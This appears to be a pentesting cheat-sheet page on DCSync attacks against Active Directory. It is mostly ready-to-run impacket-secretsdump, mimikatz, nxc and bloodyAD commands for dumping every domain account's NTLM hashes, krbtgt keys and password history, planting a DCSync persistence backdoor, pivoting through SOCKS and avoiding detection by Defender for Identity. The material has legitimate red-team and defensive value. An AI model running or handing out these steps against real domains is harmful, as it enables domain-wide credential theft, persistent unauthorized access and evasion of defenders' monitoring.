DCSync | JinPwn

Sections DCSync

The DRSUAPI-based credential dump. With the right rights, you ask the DC to replicate every account’s credential material to you. No code execution on the DC needed.

DC=10.10.11.50
DOMAIN=corp.local
USER='svc_user'
PASS='Password1'

i. Who has DCSync rights by default

These groups have the DS-Replication-Get-Changes + DS-Replication-Get-Changes-All extended rights on the domain object:

Domain Admins
Enterprise Admins
Administrators (BUILTIN)
Domain Controllers
Read-only Domain Controllers (partial)
Account Operators (no, but Read-only via specific ACLs in some configs)
Any account explicitly delegated the right (Exchange installs, monitoring tools, third-party syncs)

ii. Find DCSync-capable principals

BloodHound query:

MATCH p=(u)-[r:GetChanges|GetChangesAll|DCSync]->(d:Domain)
RETURN u.name, d.name

bloodyAD LDAP query (looks at domain ACEs for the two extended rights):

## Show the domain object's ACL, look for the GetChanges* rights:
bloodyAD -d $DOMAIN -u $USER -p $PASS --host $DC get object "DC=corp,DC=local" --resolve-sd

nxc check:

nxc ldap $DC -u $USER -p $PASS -M daclread -o TARGET='Domain Admins'

iii. Full DCSync - dump everything

Pull every account’s NTLM hash, Kerberos keys, password history:

impacket-secretsdump $DOMAIN/Administrator:$PASS@$DC
## With hash:
impacket-secretsdump -hashes :$NTHASH $DOMAIN/$USER@$DC
## With Kerberos:
impacket-secretsdump -k -no-pass $DOMAIN/$USER@$DC

Output:

*.local file with all NTLM hashes (user:RID:LM:NTLM:::)
.cleartext file with anything in cleartext (LSA secrets, etc)
.kerberos file with AES keys

Pipe to specific files:

impacket-secretsdump $DOMAIN/Administrator:$PASS@$DC -outputfile dump
## dump.ntds = NTLM hashes
## dump.ntds.kerberos = AES keys
## dump.ntds.cleartext = anything in cleartext

iv. Targeted DCSync - just specific accounts

When you only need a specific user (less noisy, smaller output):

impacket-secretsdump -just-dc-user Administrator $DOMAIN/$USER:$PASS@$DC
impacket-secretsdump -just-dc-user krbtgt $DOMAIN/$USER:$PASS@$DC
impacket-secretsdump -just-dc-user 'CORP\Administrator' $DOMAIN/$USER:$PASS@$DC
## Multiple users at once not supported, run per-user

The krbtgt hash is the goal for Persistence golden tickets. Always pull it once you have DCSync.

v. Only NTLM hashes (skip Kerberos keys, skip history)

Fastest, smallest output:

impacket-secretsdump -just-dc-ntlm $DOMAIN/$USER:$PASS@$DC

vi. Include password history (for password reuse analysis)

impacket-secretsdump -history $DOMAIN/$USER:$PASS@$DC

Output includes _history0, _history1, etc per user. Useful for cracking old hashes that may still work elsewhere, or for predicting next password.

vii. nxc one-shot DCSync

nxc smb $DC -u $USER -p $PASS --ntds
nxc smb $DC -u $USER -p $PASS --ntds --user Administrator
nxc smb $DC -u $USER -H $NTHASH --ntds

Behind the scenes uses secretsdump but stores results in nxc’s database for cross-host reuse.

viii. Mimikatz DCSync (from Windows)

mimikatz # privilege::debug
mimikatz # lsadump::dcsync /domain:corp.local /user:Administrator
mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt
mimikatz # lsadump::dcsync /domain:corp.local /all /csv

Output for golden ticket use:

Object RDN           : krbtgt
** SAM ACCOUNT **
SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
...
Credentials:
  Hash NTLM: 0123456789abcdef0123456789abcdef         <-- krbtgt NT hash
  ntlm-0:   0123456789abcdef0123456789abcdef
* Primary:Kerberos-Newer-Keys *
  Default Salt: CORP.LOCALkrbtgt
  Default Iterations: 4096
  Credentials:
    aes256_hmac (4096): abcdef...                     <-- AES256 key (preferred for diamond tickets)
    aes128_hmac (4096): ...
    des_cbc_md5 (4096): ...

ix. Granting DCSync to a controlled account

You’re DA temporarily (token theft, kerberos abuse) and you want long-term access. Grant DCSync to a non-privileged user, lose nothing if your DA access is revoked:

bloodyAD -d $DOMAIN -u Administrator -p $ADMINPASS --host $DC add dcsync svc_user
## Now svc_user can DCSync anytime
bloodyAD -d $DOMAIN -u Administrator -p $ADMINPASS --host $DC add dcsync attacker

Cleanup:

bloodyAD -d $DOMAIN -u Administrator -p $ADMINPASS --host $DC remove dcsync svc_user

This is the cleanest persistence backdoor short of forging tickets, see Persistence .

x. DCSync through a SOCKS pivot

You compromised an internal host and reached the DC through a SOCKS tunnel:

proxychains -q impacket-secretsdump -just-dc-user krbtgt $DOMAIN/$USER:$PASS@$DC

Make sure FQDN of the DC resolves (or use -dc-ip). The DRSUAPI traffic runs over RPC on dynamic high ports, which proxychains handles fine for TCP.

xi. DCSync requirements you need to know

DCSync calls DRSUAPI’s GetNCChanges. The DC validates:

Caller has DS-Replication-Get-Changes AND DS-Replication-Get-Changes-All on the NC head (the domain object)
Caller is either a DC machine account, or a user/group explicitly granted the rights

DS-Replication-Get-Changes-In-Filtered-Set is an additional right for some filtered attributes but not strictly needed for hash dumps.

When DCSync fails with STATUS_ACCESS_DENIED, you don’t have the rights. Recheck the ACE list:

bloodyAD -d $DOMAIN -u $USER -p $PASS --host $DC get object "DC=corp,DC=local" --resolve-sd

xii. Read-Only Domain Controllers (RODC)

RODCs only replicate the credentials of accounts in the “Password Replication Policy” allowed list. You can DCSync against an RODC and get only those creds.

When the RODC machine account is in Allowed RODC Password Replication Group, you can DCSync its own krbtgt and forge “RODC Golden Tickets” that work against the RODC but not the writable DC.

nxc smb $RODC -u $USER -p $PASS -M rdcheck                  ## list cached accounts
impacket-secretsdump -just-dc-user 'krbtgt_RODC' $DOMAIN/$USER:$PASS@$RODC

xiii. OPSEC

DCSync generates:

Event 4662 on the DC: directory service access, with the GUID of the replication right
Often flagged by ATP/Defender for Identity as a high-severity alert

The DC event has the source IP. On real engagements:

Do it once, dump everything, exit fast
Use the DC’s machine account itself if possible (less anomalous than a user account)
Skip DCSync if AD ATP / MDI is in play, use NTDS.dit VSS snapshot (less alerting) - see Credential Dumping section ii

xiv. After DCSync

You have every NTLM hash in the domain. Next steps:

Crack the highest-value accounts (DA, EA, important service accounts), see Password Cracking
PtH to any host with the krbtgt or admin hash, see Lateral Movement
Forge golden tickets for persistence, see Persistence
Re-collect BloodHound - every account is now “owned”

The cracked password is gold

Even with NTLM, getting the actual cleartext often unlocks more (encrypted backups, app logins, SaaS, VPN). Always try to crack DA passwords even when PtH works.

i. Who has DCSync rights by default #

ii. Find DCSync-capable principals #

iii. Full DCSync - dump everything #

iv. Targeted DCSync - just specific accounts #

v. Only NTLM hashes (skip Kerberos keys, skip history) #

vi. Include password history (for password reuse analysis) #

vii. nxc one-shot DCSync #

viii. Mimikatz DCSync (from Windows) #

ix. Granting DCSync to a controlled account #

x. DCSync through a SOCKS pivot #

xi. DCSync requirements you need to know #

xii. Read-Only Domain Controllers (RODC) #

xiii. OPSEC #

xiv. After DCSync #